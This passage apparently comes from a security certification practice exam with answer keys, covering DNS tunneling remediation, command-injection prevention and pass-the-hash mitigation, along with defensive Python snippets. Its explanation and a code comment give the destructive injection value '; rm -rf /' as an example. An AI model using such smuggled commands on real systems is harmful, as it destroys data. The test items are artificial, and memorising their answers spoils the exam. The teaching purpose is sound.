DNS tunneling is a sophisticated and increasingly common attack technique used by threat actors to bypass traditional network security controls, including firewalls and intrusion detection systems. In DNS tunneling, attackers encode data within DNS queries and responses, typically using TXT or other record types, to create a covert communication channel between a compromised host and an external attacker-controlled server. Unlike conventional attacks that rely on HTTP, HTTPS, or other standard protocols, DNS tunneling exploits the ubiquitous nature of DNS traffic, which is often allowed through corporate networks with minimal inspection.

In the scenario described, the network security team observed an unusually high volume of outbound DNS requests, specifically TXT records, each containing long encoded strings. This is a hallmark of DNS tunneling, because TXT records are designed to hold arbitrary text data, which attackers can exploit to carry payloads, exfiltrate sensitive information, or establish command-and-control (C2) channels. The encoded strings can carry a wide range of information, including password hashes, proprietary company data, or system configuration details.

The first and most critical remediation step is to immediately block suspicious DNS requests. This prevents further exfiltration of sensitive data and stops the attacker from continuing to communicate with the external server. Blocking can be implemented at the firewall, DNS server, or network security appliance level, focusing on domains, subdomains, or IP addresses known or suspected to be associated with malicious activity. Additionally, isolating the affected host is vital. Isolation serves multiple purposes: it prevents the compromised machine from continuing to send out encoded DNS queries, limits lateral movement within the network, and preserves evidence for subsequent forensic investigation. By taking these steps, the organization enforces containment while maintaining the integrity of the investigation.

Further preventive measures include deploying DNS security solutions that perform deep packet inspection of DNS traffic, looking for anomalous patterns such as unusually long queries, high request frequency, uncommon record types (like TXT), or encoded payloads. Organizations can also implement logging and monitoring of DNS activity to detect early signs of tunneling, enabling proactive response. These solutions, combined with security information and event management (SIEM) platforms, allow correlation with other potential indicators of compromise, providing a comprehensive threat-hunting capability.
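
Detection of this pattern can also be automated from resolver logs; the sketch below flags hosts issuing unusually many, unusually long TXT queries, using fabricated records and assumed thresholds that would be tuned against the organization's DNS baseline.

```python
from collections import defaultdict

MAX_TXT_PER_HOST = 50     # assumed: TXT queries per host per interval
MAX_AVG_QNAME_LEN = 60    # assumed: long names suggest encoded payloads

def dns_tunnel_suspects(records):
    """records: iterable of (source_host, qtype, qname) from resolver logs.
    Flag hosts issuing many long TXT queries, the volume-plus-length
    pattern typical of DNS tunneling."""
    stats = defaultdict(lambda: [0, 0])        # host -> [query count, total name length]
    for host, qtype, qname in records:
        if qtype == "TXT":
            stats[host][0] += 1
            stats[host][1] += len(qname)
    return [
        host for host, (count, total_len) in stats.items()
        if count > MAX_TXT_PER_HOST and total_len / count > MAX_AVG_QNAME_LEN
    ]

# Fabricated resolver log sample: one host sending many long TXT lookups.
sample = [("WKSTN-31", "TXT", "A" * 70 + ".exfil.example.net")] * 60
sample += [("WKSTN-02", "TXT", "example.com")] * 3
print(dns_tunnel_suspects(sample))   # ['WKSTN-31']
```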

B) Increase TTL values on DNS responses

Time-to-live (TTL) values in DNS responses define how long a DNS resolver should cache a given record before querying the authoritative server again. While increasing TTL values reduces the frequency of DNS lookups, it does not address the underlying threat of DNS tunneling. Attackers can still encode large amounts of data in each query, and the tunneling channel will remain functional regardless of caching behavior. In fact, high TTLs may even reduce detection opportunities, because fewer queries are logged at the recursive resolver level, potentially giving attackers more time to exfiltrate data before anomalies are noticed. Therefore, TTL adjustments are irrelevant as a mitigation technique in this context.

C) Disable all DNS-over-HTTPS (DoH) traffic  

DNS-over-HTTPS (DoH) encrypts DNS traffic to prevent interception or manipulation by third parties. While DoH can be used by attackers to bypass some monitoring systems, the tunneling described in this scenario is occurring over standard DNS requests, not DoH. Blocking DoH traffic would have no impact on the ongoing data exfiltration, because the malicious activity is observable in unencrypted DNS queries that the network team has already detected. DoH mitigation is a useful strategy in networks that allow DoH traffic to bypass traditional DNS controls, but in this case, it is irrelevant.

D) Flush the DNS cache on all internal machines  

Flushing DNS caches removes cached entries from local resolvers on endpoints, which forces clients to query authoritative servers again. While this can be useful for clearing stale records or addressing misconfigurations, it does not stop active DNS tunneling, nor does it prevent future exfiltration. The attacker can continue to generate new queries containing encoded payloads immediately after cache flushing. Therefore, cache flushing is insufficient as a remediation measure and does not address the root cause of the security incident.

DNS tunneling represents a highly stealthy and effective method for attackers to bypass traditional network defenses and exfiltrate sensitive information. Key indicators include unusual volumes of DNS requests, the use of non-standard record types like TXT, and the presence of long or encoded payloads. Effective remediation requires immediate containment: blocking suspicious DNS queries and isolating the compromised host. This strategy prevents further data loss, halts the attacker’s communication channel, and preserves the evidence required for forensic investigation.

Other options, such as adjusting TTL values, disabling DoH, or flushing DNS caches, do not address the underlying threat and therefore are insufficient as primary remediation actions. A proactive approach also involves implementing DNS security solutions, monitoring, logging, anomaly detection, and network segmentation to reduce the likelihood of future incidents. By combining immediate containment with long-term monitoring and prevention, organizations can effectively mitigate the risks associated with DNS tunneling and protect sensitive data from covert exfiltration channels.

Question 39

A penetration testing team successfully exploits a flaw in a web application that allows executing OS-level commands through a vulnerable parameter. The vulnerability was caused by improper sanitization of input passed directly into shell commands. Which control would MOST effectively prevent this class of vulnerability?

A) Implementing server-side input validation with parameterized commands
B) Enforcing TLS encryption for all HTTP requests
C) Adding more firewall rules
D) Increasing timeout thresholds for web sessions

Answer: A

Explanation:

A) Implementing server-side input validation with parameterized commands 

Command injection vulnerabilities are a category of security flaws that occur when an application passes unsafe user input directly into system-level commands. These vulnerabilities arise from a failure of proper input validation and sanitization, allowing an attacker to manipulate the structure of commands executed on the operating system. For example, an attacker might append a shell metacharacter sequence such as "; rm -rf /" to a parameter, resulting in the execution of arbitrary destructive commands.

The most effective mitigation for this type of attack is implementing server-side input validation combined with parameterized commands or safe APIs. Input validation ensures that only expected, well-formed data is processed by the application. Techniques for this include whitelisting allowed characters or patterns, type checking, and rejecting unexpected inputs. Parameterized commands, sometimes called prepared statements in database contexts, separate code logic from user input, ensuring that user-supplied data cannot alter the intended execution flow.

In addition, modern secure coding guidelines recommend using APIs that avoid direct shell invocation entirely whenever possible. For instance, if a web application needs to interact with the file system or execute administrative tasks, developers should use language-specific libraries or system functions that handle user input safely instead of building shell command strings dynamically. Secure frameworks and libraries may also provide built-in sanitization functions or escape routines that prevent injection.

By combining rigorous input validation and parameterized commands, the application effectively neutralizes the attack vector. Any malicious input would either be sanitized or rejected, preventing the attacker from executing arbitrary system commands. Moreover, these practices enhance code maintainability and security by enforcing clear separation between data and executable logic.
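
A minimal Python sketch of the pattern follows: validate input on the server side, then invoke the command with an argument list rather than a shell string. The directory, filename convention, and use of gzip are illustrative assumptions.

```python
import subprocess
from pathlib import Path

ALLOWED_DIR = Path("/var/app/reports")   # assumed application data directory

def archive_report(filename: str) -> None:
    """Run an OS command safely: validate the input against a strict pattern,
    then pass arguments as a list so no shell ever interprets user text."""
    # Server-side validation: accept only plain names (letters, digits, _ , -).
    if not filename.replace("_", "").replace("-", "").isalnum():
        raise ValueError("invalid report name")
    target = ALLOWED_DIR / f"{filename}.csv"

    # Parameterized invocation: no shell=True and no string concatenation, so
    # input such as "; rm -rf /" is treated as literal data, never as commands.
    subprocess.run(["gzip", "--keep", str(target)], check=True)

# archive_report("q3_sales")       # compresses /var/app/reports/q3_sales.csv
# archive_report("x; rm -rf /")    # raises ValueError before any command runs
```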

B) Enforcing TLS encryption for all HTTP requests  

TLS (Transport Layer Security) provides encryption for data in transit, ensuring that communication between clients and servers cannot be easily intercepted or tampered with by network attackers. While TLS is critical for protecting sensitive information such as login credentials, credit card numbers, and personally identifiable information, it does not inspect or modify the content of requests at the application level. TLS does not prevent malicious payloads from being submitted to a web application. Therefore, while TLS improves confidentiality and integrity during transmission, it does not mitigate command injection vulnerabilities.

C) Adding more firewall rules  

Firewalls primarily control network traffic based on IP addresses, ports, and protocols. They are effective for limiting network exposure, blocking unauthorized access, and filtering certain types of known threats. However, firewalls cannot understand the logic of application-level commands or detect whether a particular HTTP request parameter contains malicious input intended to execute system commands. Therefore, adding more firewall rules will not stop attackers from exploiting poorly sanitized parameters. Firewalls are a defense-in-depth measure but not a solution for command injection vulnerabilities.

D) Increasing timeout thresholds for web sessions 

Session timeout thresholds govern how long a user session remains active before automatic logout occurs. While important for reducing the risk of unauthorized access through abandoned sessions, session timeout settings have no effect on whether user input can execute arbitrary system commands. Command injection attacks are executed at the moment a request reaches the server, independent of session duration. Therefore, increasing timeout thresholds is irrelevant to preventing this class of vulnerabilities.

  The most effective control for preventing command injection attacks is to validate and sanitize user input on the server side and use parameterized commands or safe APIs, effectively separating untrusted input from system-level execution. Other measures like TLS, firewalls, or session timeouts contribute to broader security hygiene but do not directly mitigate the vulnerability itself.

Question 40

A security analyst finds that an attacker gained access to a domain administrator account using pass-the-hash techniques. The attacker then used the stolen hash to authenticate to multiple servers without needing the actual password. What is the BEST long-term mitigation to prevent similar attacks?

A) Implementing credential guard or similar protections to prevent hash extraction
B) Rotating passwords every 30 days
C) Blocking all RDP connections
D) Deploying a new antivirus solution with better signature detection

Answer: A

Explanation:

A) Implementing credential guard or similar protections to prevent hash extraction  

Pass-the-hash (PtH) attacks exploit the way Windows authentication works by allowing an attacker to reuse password hashes rather than needing the plaintext password. Once an attacker extracts hashes from the Security Account Manager (SAM), LSASS process memory, or cached credentials, they can impersonate privileged accounts across the network, including domain administrators. This technique enables lateral movement and often allows attackers to compromise entire Active Directory domains.

The most effective long-term mitigation is to prevent the hashes themselves from being extracted. Technologies such as Microsoft Credential Guard achieve this by isolating secrets like NTLM and Kerberos credentials in a secure, virtualization-based environment. Even if an attacker gains local administrative access, Credential Guard prevents them from accessing the underlying hashes in memory. This dramatically reduces the risk of pass-the-hash attacks.

In addition to Credential Guard, organizations can implement complementary defenses:

Disabling NTLM authentication wherever possible, relying on Kerberos instead.

Using the Protected Users group to restrict authentication methods and prevent caching of credentials.

Enforcing LSASS protection to prevent unauthorized memory access.

Applying strong endpoint hardening and least-privilege administration to reduce the number of accounts at risk of hash theft.

Long-term prevention focuses on eliminating the attack vector (hash extraction) rather than temporary measures like frequent password rotation. This approach addresses the root cause and is far more effective than mitigating symptoms.
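
As a rough illustration, the Windows-only sketch below (standard-library winreg) reads the LsaCfgFlags registry value used to configure Credential Guard; treat it as a hint only, since the interpretation here follows public documentation and the authoritative check is Microsoft's own tooling (for example, msinfo32 or the Device Guard readiness script).

```python
import winreg

def credential_guard_configured() -> bool:
    """Return True if LsaCfgFlags is set to 1 (enabled with UEFI lock) or
    2 (enabled without lock); 0 or a missing value means not configured.
    Note this reflects configuration, not whether VBS is actually running."""
    try:
        with winreg.OpenKey(
            winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Lsa"
        ) as key:
            value, _ = winreg.QueryValueEx(key, "LsaCfgFlags")
            return value in (1, 2)
    except FileNotFoundError:
        return False

if __name__ == "__main__":
    print("Credential Guard configured:", credential_guard_configured())
```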

B) Rotating passwords every 30 days  

While password rotation can limit exposure if a password is compromised, it does not prevent pass-the-hash attacks. Attackers do not need the plaintext password if they have captured reusable credential hashes. Frequent rotations also introduce operational complexity and may lead to weaker password choices or risky storage practices.

C) Blocking all RDP connections  

Remote Desktop Protocol (RDP) is one vector attackers use for lateral movement, but pass-the-hash attacks can occur over multiple protocols such as SMB, WinRM, and WMI. Simply blocking RDP addresses only one vector and leaves other attack surfaces open. A holistic approach focusing on credential protection is required.

D) Deploying a new antivirus solution with better signature detection 

Pass-the-hash attacks exploit authentication protocols rather than malware signatures. Antivirus solutions, no matter how advanced, cannot prevent hash-based authentication abuse. They may detect malware used to obtain credentials, but this is not a reliable mitigation for PtH attacks.

  The BEST long-term mitigation for pass-the-hash attacks is to implement protections that prevent hash extraction, such as Credential Guard, endpoint hardening, LSASS protection, and Kerberos-only authentication. Temporary measures like password rotation, RDP blocking, or antivirus updates may help but do not address the core vulnerability. Focusing on credential isolation and minimizing exposure of hashes is the most strategic and effective defense.
